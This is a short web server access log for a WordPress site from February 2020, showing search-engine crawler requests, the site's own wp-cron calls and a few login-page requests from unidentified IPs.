157.55.39.29 - - [02/Feb/2020:17:41:28 +0100] "GET /robots.txt HTTP/1.1" 404 2969 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.61 - - [02/Feb/2020:17:41:28 +0100] "GET /?page_id=10 HTTP/1.1" 200 19708 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.29 - - [02/Feb/2020:17:41:29 +0100] "GET /robots.txt HTTP/1.1" 404 4665 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.149.25 - - [02/Feb/2020:17:46:21 +0100] "GET /robots.txt HTTP/1.1" 404 4419 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
185.85.190.132 - - [02/Feb/2020:18:13:26 +0100] "GET /wp-login.php HTTP/1.1" 200 7045 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:18:13:26 +0100] "POST /wp-cron.php?doing_wp_cron=1580663606.7360239028930664062500 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
185.85.190.132 - - [02/Feb/2020:18:13:26 +0100] "POST /wp-login.php HTTP/1.1" 200 4633 "https://fincasandoval.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.64.90 - - [02/Feb/2020:18:37:14 +0100] "GET /ads.txt HTTP/1.1" 404 4665 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.248.107.232 - - [02/Feb/2020:18:56:16 +0100] "POST /wp-cron.php?doing_wp_cron=1580666176.4870419502258300781250 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
185.86.164.99 - - [02/Feb/2020:18:56:16 +0100] "GET /wp-login.php HTTP/1.1" 200 7045 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.86.164.99 - - [02/Feb/2020:18:56:16 +0100] "POST /wp-login.php HTTP/1.1" 200 4633 "https://fincasandoval.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:19:33:46 +0100] "POST /wp-cron.php?doing_wp_cron=1580668426.5904679298400878906250 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
